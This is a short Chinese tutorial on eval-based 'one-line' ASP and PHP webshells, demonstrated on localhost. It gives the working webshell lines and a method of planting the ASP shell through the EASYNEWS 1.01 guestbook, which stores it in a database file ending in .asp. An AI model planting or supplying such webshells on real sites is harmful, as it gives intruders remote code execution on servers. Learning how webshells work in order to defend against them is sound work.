一句话木马原理

1. 搭建模拟环境了解一句话木马的原理.

   (1).创建1.asp文件,代码如下:

        <%eval request("value")%>

       (2).创建2.php文件,代码如下:

         <?php @eval($_REQUEST['value']);?>

        创建了1个asp一句话木马文件,1个php一句话木马文件，上面的代码的意思是获取get/post来的value值，当作脚本代码执行。

        我们访问http://localhost/1.asp?value=Response.Write("gaojiufeng")    将会直接执行value的语句,输出gaojiufeng

        我们访问http://localhost/2.php?value=echo  gaojiufeng;    将会直接执行value的语句,输出gaojiufeng

        也就说一句话木马的语句都会将get/post的代码执行,为什么中国菜刀能获取到网站和服务器的磁盘列表，就是通过对应的asp/php等代码获取到

    2.通过本地的程序了解留言板提交一句话木马为什么可以直接连接

        (1).下载EASYNEWS1.01程序在本地部署

        (2).通过留言板留言，主页中填 <%eval request("value")%>,提交留言

        我们访问http://localhost/ebook/db/ebook.asp?value=Response.Write("13092996963"),将会输出我的手机号码13092996962;

        为什么访问/ebook/db/ebook.asp就能执行语句，我并没有创建一句话木马文件啊？由于ebook.asp是一个数据库accesss数据库文件,修改为asp后服务器认为数据库内容中的<%eval request("value")%>属于asp代码，其他不认识的一律认为是html标签输出。因此导致这个文件可以作为一句话木马连接。